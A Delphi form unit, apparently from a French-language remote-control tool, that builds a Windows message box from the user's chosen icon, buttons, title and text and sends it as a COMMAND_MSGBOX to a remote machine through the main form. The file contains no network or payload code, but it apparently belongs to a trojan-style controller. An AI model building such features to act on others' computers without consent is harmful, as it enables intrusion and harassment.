(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untMsgBox.pas                                   ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of MsgBox form                      ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untMsgBox;

interface

uses
  Windows, SysUtils, Classes, Controls, Forms,
  StdCtrls, ExtCtrls, Buttons;

type
  TfrmMsgBox = class(TForm)
    GruIcon: TGroupBox;
    SpdNone: TSpeedButton;
    SpdQuestion: TSpeedButton;
    SpdExclamation: TSpeedButton;
    SpdInfo: TSpeedButton;
    SpdCritical: TSpeedButton;
    RdoButtons: TRadioGroup;
    Label5: TLabel;
    Label6: TLabel;
    Label7: TLabel;
    SpdTestMsg: TSpeedButton;
    SpdSend: TSpeedButton;
    EdtText: TEdit;
    EdtTitle: TEdit;
    procedure GlobalIcon(Sender: TObject);
    procedure RdoButtonsClick(Sender: TObject);
    procedure SpdTestMsgClick(Sender: TObject);
    procedure SpdSendClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    carIcon,carButton:Cardinal;
  public
    { Public declarations }
  end;

var
  frmMsgBox: TfrmMsgBox;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmMsgBox.GlobalIcon(Sender: TObject);
begin
   carIcon:=(Sender as TSpeedButton).Tag;
end;

procedure TfrmMsgBox.RdoButtonsClick(Sender: TObject);
begin
   case RdoButtons.ItemIndex of
      0: carButton:=MB_OK;
      1: carButton:=MB_OKCANCEL;
      2: carButton:=MB_YESNO;
      3: carButton:=MB_YESNOCANCEL;
      4: carButton:=MB_RETRYCANCEL;
      5: carButton:=MB_ABORTRETRYIGNORE;
   end;
end;

procedure TfrmMsgBox.SpdTestMsgClick(Sender: TObject);
var
   NewText: string;
begin
   NewText:=StringReplace(EdtText.Text,'|',Chr(13),[rfReplaceAll]);
   MessageBox(application.handle,PChar(NewText),PChar(EdtTitle.Text),
            carIcon + carButton + MB_SYSTEMMODAL);
end;

procedure TfrmMsgBox.SpdSendClick(Sender: TObject);
var
   MsgArgs:string;
begin
   MsgArgs:=EdtTitle.Text;
   MsgArgs:=MsgArgs + Chr(13) + IntToStr(carIcon + carButton + MB_SYSTEMMODAL);
   MsgArgs:=MsgArgs + Chr(13) + EdtText.Text;
   frmMain.strStatus:='Envoit du message...';
   frmMain.SendCommand(COMMAND_MSGBOX,MsgArgs);
end;

procedure TfrmMsgBox.FormCreate(Sender: TObject);
begin
   Caption:='Boite de message';
   RdoButtonsClick(RdoButtons);
   GlobalIcon(SpdNone);
end;

end.
